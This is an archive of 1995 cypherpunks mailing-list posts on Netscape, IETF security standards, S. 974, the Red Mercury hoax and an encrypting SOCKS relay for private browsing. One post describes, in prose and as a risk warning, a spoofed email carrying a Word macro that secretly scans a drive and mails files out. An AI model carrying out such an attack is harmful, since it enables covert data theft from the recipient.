> "Secure/MIME," or "S/MIME."

Huh? Don't know about MOSS? Its now hit Proposed Standard....

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:36:53 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac33f977080210043230@[205.199.118.202]>
Message-ID: <9507210836.AA21665@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> one way or the other, and will join the rest of the world (apparently) in
> using Netscape.

This from "Mr. Ascii" as of six months ago. Everyone remember when Tim
was flaming MIME and the rest? Well, Netscape was out back then, too.

> And yes, I am "marginalizing" the work that anyone does on "fringe"
> projects like Linux, which will likely always remain in the ghetto
> of Unix hackers who want a cheap Unix running on their cheap 486
> boxes...it just ain't gonna take over inside corporations or amongst
> the many folks like me.

I apologise for doing my IPSP work on a marginal operating system like
BSD Unix. Were I a truly non-marginalized person, I'd have realized
that Novell Netware and Appletalk were the internetworking
technologies of the future. I would suggest that you get rid of your
web browser while you can -- it was descended from code written for
Unix, that marginalized operating system. By the way, I understand
Netscape does their development with marginalized machines.

> That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others
> are working on an interoperable "Secure/MIME" should be encouraging.

I'm glad to see you've not been paying attention to the IETF work on
MOSS. After all, we are a marginalized group -- we only built the
Internet, you know.

Perry, writing from the marginalized IETF meeting in Stockholm, where
the nowhere people define standards no one uses.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 01:40:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <9507210840.AA22286@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
> technically superior and deserves to be as popular as Netscape and simiar
> approaches, but reality is reality.

I assume everyone but Tim knows about Netscape's origins in Mosaic,
and understands thus why his comments above are so amusing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 03:00:40 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <ac3406e80c0210045a87@[205.199.118.202]>
Message-ID: <9507210900.AA25179@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> In my posting on why I think Netscape and related operating environments
> represent the likeliest targets for widespread crypto use (the "big win" I
> used in my title), I did not whine that others ought to write code for me.
> I said that this is where users were going in massive numbers.
> 
> Take it or leave it, as an analysis, but the "try writing some code" is a
> meaningless insult.

Some of us have spent the last several days not getting sleep and
going to meetings here in Stockholm -- defining security standards,
talking to Microsoft people about IPSP integration into Win '95 and
Windows NT, recruiting people to work on the project we have to make
sure that the IETF meeting in Dallas in a few months will have IPSP
security. We hope to have the whole infrastructure of the internet
encrypted within a year or two. I believe that between IPSP for the
links and MOSS (and SHTTP using MOSS for document security) we should
have the whole thing wrapped up in a couple of years. Problems still
to solve include security for the internet's routing protocols,
protection against denial of service attacks, etc.

Remailers and the like are still worthwhile areas for effort, of
course, but I think of those of applications of the secure
infrastructure.

Those people who would rather work than talk are invited to start
reading the internet drafts (some of which are soon to be RFCs) and
help out with the effort. I suspect that a big push from about 25
people could manage to implment just about everything we want and then
we could go on and live the rest of our lives.

There is a lot of real hard work to do in the next year or two and I
invite members of the community to quit waiting for the CryptoRapture
in which the X-Ists bring down the cypher systems of the future, and
help us actually do the job so that we'll see this stuff in our
lifetime.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:19:30 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
In-Reply-To: <199507202345.SAA24056@mail.socketis.net>
Message-ID: <9507210919.AA27922@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



The Wall Street Journal had a fascinating article on the scams about
"Red Mercury" in the former soviet union -- suffice it to say the
whole thing is bogus.

.pm

Gary Jeffers writes:
>             DOVE/Red Mercury dooms U.S Super State?    =20
> 
>    The first part of this post deals with Red Mercury. The
> remainder
> deals generally with cheap weapons of mass destruction and




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 21 Jul 95 02:31:56 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: It had to happen...
In-Reply-To: <v02120d3eac3499ebec14@[199.2.22.120]>
Message-ID: <9507210931.AA29736@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Douglas Barnes writes:
> Has anyone caught this yet? From "No Such Agency" to having
> their own Web page... wow.

They also have a Fortezza based web security system. One of their guys
was discussing some of that here at IETF.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 21 Jul 95 05:09:18 PDT
To: rah@shipwright.com
Subject: Netscape the Big Win(dows)
In-Reply-To: <v02120d00ac34bcc434d6@[199.0.65.105]>
Message-ID: <199507211204.AA19453@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
   sound like someone who's totally enamored with their "-works" app. Most
   people end up using more specialized apps when they hit the wall with
   something which won't get all those "general purposes" taken care of...

While I understand what Tim's been saying about integrated apps, since
my Dad continues to use Microsoft Works instead of Wordperfect which is
much better, my Dad is limiting himself in ways that ultimately Tim isn't
going to accept.

Remember, he also raved about the Newton for the first couple of months.
I wonder if he's replaced the one he sold yet.

Phil






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Fri, 21 Jul 95 05:23:04 PDT
To: cypherpunks@toad.com
Subject: The OS wars and DOOM...
Message-ID: <199507211218.AA20295@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



This is a point I want to bring up regarding the current
OS war being waged on this group.

Apps have migrated from Unix to the Mac and the PC before in
the past. In the further past, this has included curses and
other-types-of-text-control packages such as PC versions of
Emacs and nethack and the like.

Of course, this was not done with graphical programs; everyone knows
that graphics isn't Unix's strong suit, and what it has is so different
from the PC, etc., blah, blah,...

Except that for the past two or three years, it's been WRONG.

One of the hottest games on the PC, DOOM, was originally written in
Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" of
Unix) and then ported to the PC.

I don't know which Unix environment they're using in the "master"
development effort before porting to other environments today.

Given that games usually program close to the hardware, and are 
therefore the _most_ difficult things to port from one environment
to another, it really makes one wonder why Excel isn't out for
(for example) Linux or BSD today.

Then again, SCO WordPerfect is...

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Mon, 21 Aug 95 07:24:28 PDT
To: cypherpunks@toad.com
Subject: Re: Legality of suverting computational cycles via Microsoft
Message-ID: <199508211423.HAA08515@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>Does anybody here know if it is illegal to get unwiting users to download
>benign viruses via MSN?
>
>Doesn't this sort of hole, by its very nature, make it trivial for people
>to violate Europes future electronic privacy laws? (despite Microsoft's
>guarantee that MSN would follow those rules.)
>
>JWS
>

Yes, the whole MSN virus thing is quite interesting from a privacy standpoint.  About 9 months ago (after I'd left Microsoft) I was evaluating the security risks of viruses that could be embedded in Word and Excel documents.  It is actually quite trivial to develop a virus or Trojan-horse with macro BASIC that is completely transparent to the user.  Once the document is opened, the code executes and does its thing. 

Many organizations use e-mail software that supports attaching a file to an e-mail message.  You double click the file icon, it runs the creator application (i.e. Word, Excel), and loads the document.  Everyone at Microsoft, uses MS Mail.  An interesting scenario I proposed would be to send e-mail to Bill Gates (anonymously or with a spoofed address) with the text body reading something like "Bill, here's a way to get more marketshare away from Novell.  Read the attached document."  He'd obviously double click the file icon, which would have some real data in it to make it look legitimate.  However, when the document opened, he would have unwittingly executed a macro that scanned his hard drive and e-mailed the directory contents or an interesting looking file or two elsewhere.

As e-mail within MSN supports this type of object/file embedding, there are not only risks from destructive viruses but also potential attacks on your privacy (no, not the MSN online registration thing, but a targeted attack by an individual/organization).

Concluding note:  When I was at MS, the saying "Eat your own dog food" was popular (akin to "some things come back to haunt you").  Last week a friend told me the company was being plagued with a non-destructive version of a Word macro-virus.  Let's say in the future someone "get's hurt" because of MSN's embedding feature and decides to sue Microsoft.  It will be interesting to see the company's response when they knew that a security flaw existed internally, but did nothing to resolve it externally.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 21 Jul 95 05:43:46 PDT
To: <cypherpunks@toad.com
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
Message-ID: <9507211243.AA25591@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>             DOVE/Red Mercury dooms U.S Super State?    =20

UNALTERED Desemination of This Important Information is 
ENCOURAGED :-> (or words to that effect - anyone have the
canonical form available?)

>& Finally: In the old Feudal days, wars weren't so bad. The 
>nobility would fight while the peasants watched nearby & 
>cheered the sport.

If this is an example of the depth of your research, then we
certainly don't have to worry about anything else in your post.
The peasants were economic assets, and their destruction was
regarded as a standard practice of war. Try reading Barbara
Tuchman's 'A Distant Mirror: The Calamitous 14th century.'

[I must admit, however, that the idea of Bush and Sadaam Hussein
having it out has a certain appeal - battleaxes in a blacked
out cellar sounds appropriate.]


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 21 Jul 95 09:51:45 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507201536.LAA05105@eff.org>
Message-ID: <300f5b5a.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


Many of the leaders of the major net civil liberties organizations have made
statements concerning SB 974. They seem to agree that no action alert
or coalition on SB 974 should be formed at this time.

Some of the statements about SB 974.

"Silly Bill"
"not going anywhere"
"subcommittee hearing not set yet"
"premature"
"inflammatory distraction"
"campaign is unlikely to be successful"
"the bill is doomed"

I remain concerned about this bill and am not satisfied with the response
to this bill.

Exon was a silly bill, but it passed the Senate by a wide margin.
How can a campaign to stop the bill not be successful if the bill
is not going anywhere? Perhaps we need to have a success to
gain momentum. The people on the subcommittee are going to be very
important as the rest of the Senate will consider them to be the "experts".
Since the net is esoteric to most people there will be a strong tendency
to depend on the "experts". The best time to persuade these "experts"
will be before they make any public statements about the bill in the
subcommittee hearings and their positions are locked by pride not 
wanting to publicly change their positions. Thus we should be contacting
these people now, and we may have a chance to nip SB 974 in the bud.

By the way, what subcommittee was it sent to? I understand it was
one of the subcommittees of Judiciary but no one said which one.
Because there is no action alert, people do not know what States 
have the senators on the sub-committee. People from these States
are the ones that should be especially encouraged to contact their Senators.

In any case, it is clear that if any significant action on SB 974 will
be taken at this time, the CYPHERPUNKS will have to do it. The major
net civil liberties organizations have bowed out for now.

Are there any cypherpunks out there who can help? Perhaps someone
has writing skills that would be willing to write an action alert?
Perhaps someone knows which subcommittee it was sent to?
Since SB 974 hobbles our right to use encryption, the cypherpunks
should be especially interested in opposing it.

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:09:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <ac351dc10f021004de07@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:42 AM 7/21/95, Lucky Green wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <ac33f977080210043230@[205.199.118.202]>, tcmay@sensemedia.net
>(Timothy C. May) wrote:
>
>>Frankly, one of the great boons of my current setup is that I can
>>completely get away from Unix tools and commands, away from my Unix shell
>>account at Netcom, away from the arcane commands that vary from program to
>>program, away from tin and elm and emacs...my fingers are already
>>forgetting the emacs commands!
>>
>>(Those of you like Unix, fine. I agree it is useful for many things, so I'm
>>not trying to debate Unix vs. the world. Just giving my perspective, and
>>apparently the perspective of the many who are adopting the Web browsers as
>>their "operating environments," insulated from the underlying cruft.)
>
>Is this the same T.C. May that used to argue vehemently that if it can't
>be displayed on a VT52, it was no good? Did a space alien take over Tim?

If you read my messages of last December, you'll see I said this on 15
December 1994:


"I see two "stable attractors" for text/graphics/multimedia/etc. sent
over the Net:

"1. Straight text, ASCII, 80 column format. All systems can handle
this, all mailers and newsreaders can handle it, it's what the Usenet
is essentially based upon, and it gets the job done. It meets the
needs of 95% of us for 95% of our needs.

"2. The Web, for graphics, images, etc. This will be the next main
stable attractor, deployed on many platforms. (I'm assuming the debate
here about Netscape standards does not imply much of a fragmentation,
that Mosaic, Netscape, MacWeb, etc., will all basically be able to
display Web pages in much the same way.)"



I'd say this is very consistent with what I've been saying recently.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:30:30 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <ac35228910021004fd83@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:54 AM 7/21/95, Robert Hettinga wrote:

>Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
>sound like someone who's totally enamored with their "-works" app. Most
>people end up using more specialized apps when they hit the wall with
>something which won't get all those "general purposes" taken care of...

No, I don't use any of the "-works" apps, and I think the success of the
Web speaks for itself...this is not a view I have just come to, as my
recent message shows.

And I'm not wedded to "Netscape" per se, though that particular environment
has the current momentum. I've also used Mosaic and MacWeb to do much the
same things, but find Netscape smoother.

Out of curiousity, the phrase "grown out of Netscape," aside from the
implied barb, means what? Just what am I missing and what do I need to
"grow out of"?

If, perchance, this is just what of those throwaway barbs, implying I move
from fad to fad (as Fraering's post implied), you should know that I stuck
with tin/elm/emacs/eudora for more than 3 years, as nothing obviously
better--and worth the learning curve to switch to--had come along. (In the
Mac domain I used other programs, none of them "-works" packages.)

But, I'll tell you what, I *will* tell you about it in 6 months, whether or
not I've grown out of Netscape!

--Tim May



..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 21 Jul 95 06:30:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507211330.AA26670@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


TC May writes:
> Frankly, one of the great boons of my current setup is that I can
> completely get away from Unix tools and commands [...]
>...my fingers are already forgetting the emacs commands!

If I forget thee, O Emacs, let my right hand forget her cunning. 
If I do not remember thee, let my tongue cleave to the roof of my 
mouth; if I prefer not Emacs above my chief joy. 

(with apologies to the psalmist)

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:50:08 PDT
To: "Robert A. Rosenberg" <cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <ac35286d130210045fc1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:45 AM 7/21/95, Robert A. Rosenberg wrote:
>At 10:39 7/20/95, Timothy C. May wrote:
>>To state an obvious non-crypto use of such "modules," why do all major word
>>processing and page layout apps have their own "dictionaries"? Why do I
>>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>>there have not been "dictionary modules," for many and sundry reasons, is
>>telling. (Before anyone mentions it, one can on the Mac use things like
>>"Thunder" instead of the local dictionaries...this is not the same as a
>>module usable by all programs, but instead is a user choice to bypass the
>>local dictionaries. We could quibble for hours about whether this is in
>>fact a universal module or not.
>
>
>Since the support that Thunder 7 provides (with Wordprocessing and
>Wordprocessing-Like Programs that it supports) is indistinguishable from
>that provided by each program's integrated SpellChecker (along with T7
>providing a common set of "extra" User-Extendable Dictionaries as well as a
>Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list
>of incorrectly spelled words for "Replace All" so the user's personal
>misspellings are automatically corrected without any interaction on his/her
>part]), I think the ball is initially in the court of those who claim it is
>not a universal module (admittedly only for those WPs it supports) to
>explain why is does not function as one would function if it existed.

Yes, I was the one who mentioned "Thunder." Should I justify why it is "not
a universal module"? I won't waste our time.

The essence, though, of having "parts" is that the suppliers of _other_
programs would not then have to supply the overlapping functions. In the
case of Thunder, it may be useful and all (which is what I said when I
mentioned it), but it's sufficiently obscure/unavailable that the makers of
my various word processing programs and page preparation programs supply
their own (and incompatible) dictionaries. This was my point.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 21 Jul 95 07:13:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507211413.AA25887@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Well, X.509 for now. The Eastlake-Kaufman DNS Security work
> (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
> --now proposed standard, awaiting an RFC number) promise to give us
> a non-X.509 certification structure for the Internet.

I have serious concerns about whether the DNS stuff will really scale.
It's gonna blow out DNS server memory use, and the bigger packets means
a *lot* more TCP (vs UDP) activity.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 21 Jul 95 10:15:14 PDT
To: cypherpunks@toad.com
Subject: Re: It had to happen...
In-Reply-To: <9507210931.AA29736@snark.imsi.com>
Message-ID: <199507211714.KAA19175@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:
> They [NSA] also have a Fortezza based web security system. One of their guys
> was discussing some of that here at IETF.

Are their Fortezza keys escrowed, or is this a "special run" of the chips
without escrow?

	Jim Gillogly
	Sterday, 28 Afterlithe S.R. 1995, 17:14




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 10:20:26 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today - 2pm EDT / 11am PDT
Message-ID: <199507211718.KAA02958@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 7/21/95 EDT, Rich Lethin wrote:
>
>Talk of the Nation on NPR is having a call-in program this afternoon
>on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
>Crypto-relevance... 4 horsepeople... 

TotN is on at 2:00 Eastern Time, 11:00 Pacific
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 10:21:32 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape the Big Win
Message-ID: <v01520d02ac359f28a3e1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 7/21/95, Ray Cromwell wrote:
>> >   The answer is: integration. While TRN is a great newsreader, and
>> >Eudora's a great mail reader, etc, if I read a post in TRN or a message
>> >in Eudora, there is no hyperlinking. If I see a link or reference,
>>
>> If you used a Mac, all you had to do is click on the URL in your mailer,
>> newsreader, even some text editors, and the correct helper aplication will
>> open the URL.
>
>  Yeah, but does it fire up 1 browser process everytime you click on it, or
>will it command an already running browser to follow the link?

If the helper app is not running it will start it, if it is running it will
pass the URL to the already running app. Note that it doesn't have to be a
browser. You can - and usually will - use separate apps for different types
of URLs.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 21 Jul 95 10:28:50 PDT
To: enzo@ima.net
Subject: Re: Netscape the Big Win
Message-ID: <199507211727.KAA06527@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Enzo Michelangeli <enzo@ima.net>
> On Thu, 20 Jul 1995, Hal wrote:
> > That is why I am working on the proxy approach.  Any browser should be
> > able to use enhancements supplied in this way.  Netscape is the big name
> > this year, who knows who it will be next year.  As long as IP
> > connectivity is available a proxy can get into the stream and apply
> > enhancements.
> 
> I still maintain that an approach based on SOCKS would be more flexible, 
> adaptable to any TCP-based application. Here's what I'm thinking about:

I agree with this general approach, but I looked into it in some detail,
and SOCKS has a fatal flaw for my purposes: the address to connect to is
passed as an IP 32-bit address.  That means the software on the PC
has to do the DNS lookup.  And *that* means that the ultimate site being
connected to is revealed.

One of my goals is to protect the secrecy of the sites that a person is
browsing.  If an in-the-clear DNS lookup is done for each site that will
hardly be effective, even if the actual connection request is encrypted.
An eavesdropper on the internet will be able to observe the DNS lookup
traffic.

Now SOCKS V5 is going to change this; it allows the proxy to receive the
request as a hostname rather than an IP address.  So no DNS lookup is
necessary by the client.  Conceivably a modified winsock such as Enzo is
suggesting could use that protocol, although it is not really stable
yet.

Also, I don't know how easy it is to intercept winsock calls and modify
them in this way.  So the proxy I have written works using the HTML proxy
hook rather than the SOCKS hook.

> 1. Windows apps: a general purpose socksifier, intercepting Winsock API
> calls by *unmodified* applications and opening a single TCP connection to 
> the port 1080 of a sockd server. The good news is: some good folks at NEC 
> are already working at this project, and are looking for beta-testers.

This sounds very good if it already is almost working.  The TCP
connection which is opened would have to be to a server on the local
machine, so it would be important that the software support that.  Also,
the local SOCKS relay would of course not want its winsock calls to be
intercepted and translated in this way, so there would need to be some
alternative way to access "vanilla" winsock.  Can you give any
more information on the NEC work?

> 2. A "SOCKS en/decrypting relay": a sockd server that, on a 
> per-site/per-port basis depending on a configuration file, may either 
>  a) open TCP connections on behalf of its clients; 
>  b) relay a plain SOCKS connection to a remote peer;
>  c) open a SSL connection to a remote peer on, say, a port 1180 reserved
>     for "SSL-ized SOCKS" connections)
> Of course, that beast should also listen at the ports 1080 and 1180 and 
> take the same actions a) b) or c) as appropriate.

For chaining purposes you would connect to the relay on the net on the
secure port and request a TCP connection (not a SOCKS connection) to
the second relay in the chain at its secure port.  Then you negotiate a
secure connection from your home PC to that second relay so that the
traffic you send to it won't be visible to the first relay.  Once that
is done you send a SOCKS request to that second relay to connect to the
next machine in the chain.  So really only function (a) is needed for
the relays on the net.

The relay on the PC needs to be able to do (c), but more importantly it
needs to be able to set up encryption chains, where every outgoing packet
is nestedly encrypted, with the outermost encryption for the first relay
in the chain, the next layer for the next relay, and so on.  Each relay
decrypts and strips off one layer, then passes the remaining raw data
through.  This way no one relay knows who is talking to whom or what they
are saying.  The reverse happens for return packets.

> The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as 
> UNIX daemon.

I have written a simple dummy relay for winsock and it requires a pretty
different programming style than for Unix.  Netscape has a habit of
firing off a bunch of requests at once, so it has to be extremely
asynchronous.  For Windows this means you get a windows message every
time a packet arrives and use non-blocking I/O.  In Unix this is usually
handled by forking a new process to handle each independent connection.
Non-blocking I/O can be used in Unix but I don't think there is a
non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
a more Unix-style communication model, though.  Should the proxy require
Windows 95, or will Windows 3 still be in widespread use for another
year or two?

Also IMO the requirements for the Internet relay are pretty different
than for the Windows relay.  The Internet relay needs only to be able to
decrypt/encrypt on the port where the request comes from while sending
plain data the other way.  It needs a config file so the owner can
control what kinds of outgoing TCP connections can be done.  The Windows
one needs to be able to do nested encryption (if chains will be allowed
eventually), to set up chains, etc.  So for these reasons I am inclined
to think that the two relays would be separate programs.

> The chain would be:
> 
> - From a Windows client machine:
> 
>  Standard app -> Socksifier DLL by NEC -> encrypting relay -----> 
>   ---> Internet -----> decrypting relay -> server
> 
> - From a Unix client machine:
> 
>  Socksified (recompiled) app -> encrypting relay ------>
>   ---> Internet -----> decrypting relay -> server
> 
> I'm assuming here that the encrypting relay should live close to machine
> (the same, or, at least on the same network) as the client app, and the
> decrypting relay close to the server. A single daemon could do both jobs, 
> allowing chaining "a` la remailer", but I'm using here two different 
> names for sake of clarity. Besides, the Windows version probably wouldn't 
> need decrypting ability.

The Windows version would need to decrypt incoming data; you don't want
that coming in the clear.

> Great advantage over Netscape: we could use EAY's free SSL implementation,
> and all the server administrators could generate and sign their own
> certificates. The present trouble with Netscape is that NS-Navigator
> refuses to accept certificates not signed as "Netscape compatible". Our
> en/decrypting relay could be more forgiving :-)

The other problem with Netscape SSL is that it will only open secure
connections to URL's marked "https://".  Similarly SHTTP has a special
URL "shttp://".  There is no provision in either one to open a secure
connection to "http://".  A relay proxy would allow all connections to be
encrypted between the PC and one or more relays.

I am a little unclear on the certificate situation.  As we saw with the
PGP key servers before RSAREF PGP existed, RSA put pressure on these
public sites which they saw as contributing to the use of infringing
software.  Similarly having a certificate created by infringing software
might be seen as illegal, even if RSAREF was actually used for the
handshaking in the protocol.  Server operators are quite vulnerable to
threatening letters from RSA.

Another problem with RSAREF is that it does not allow you to exchange a
session key using RSA encryption in a straightforward manner.  The entry
points you have legal access to choose a random session key, PK encrypt
it, send it, and then encrypt the message using that session key with DES
or 3DES.  However I notice that SSLREF calls undocumented entry points
like RSAPrivateDecrypt and RSAPublicEncrypt.  I am not sure how they are
able to do this.  Maybe they got special permission from RSA.  I don't
know whether the SSLEAY library would be able to do this without such
special arrangements.

> As the SSL stuff built in
> Netscape would be unused, we could also improve the protocol (plugging
> security holes) ignoring compatibility issues.

Yes, really there is no need to make it be SSL specifically except for
the fact that it is an explicit protocol for which libraries exist.

> The administrators of
> secure servers should just advise the users to configure their local
> encrypting relays to pass through their decrypting relay (that would boil
> down to a line added to the encrypting relay configuration). 

> It would all be beautifully modular, relatively simple to code (as someone
> else has done, or is doing, most of the hard work) and independent from
> big-brother certifying authorities. 

Yes, I think the overall approach is very promising.  Perhaps my desire
for chaining is too ambitious for a first attempt.  The transparent
intervention of SOCKS that you describe would be very nice if that is
available soon.

One other problem is the risk taken by people running the relay servers
on the net.  These could be used to launder connections by hacker /
cracker types.  So probably only a limited set of outgoing ports would be
permitted, say, 80 and 1080 which are the most common http ports.  This
would restrict the utility of the SOCKS approach for other uses like
secure telnet, unfortunately.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 09:51:46 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <9507210900.AA25179@snark.imsi.com>
Message-ID: <Pine.3.89.9507211043.B11679-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Perry E. Metzger wrote:

> sure that the IETF meeting in Dallas in a few months will have IPSP

When and where will this be in Dallas?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bostic@CS.Berkeley.EDU (Keith Bostic)
Date: Fri, 21 Jul 95 08:05:21 PDT
To: stripes@va.pubnix.com
Subject: Plan9 press release followup
Message-ID: <199507211504.LAA21881@python.bostic.com>
MIME-Version: 1.0
Content-Type: text/plain


It's been pointed out to me that the recent Plan 9 article does
not match the licensing agreement.  Nobody has any idea why the
speaker didn't understand that the software community is likely
to react badly to the phrase "any changes they make will become
AT&T's property", but there is a rumor that they *may* have been
a lawyer.  ;-}

As I understand it, the license is roughly as follows:

    + For $350, you get copies of the complete source and binaries
      for Plan 9.  You can make this copy available internally to your
      company, i.e. NFS is okay as long as it's not on the Internet.
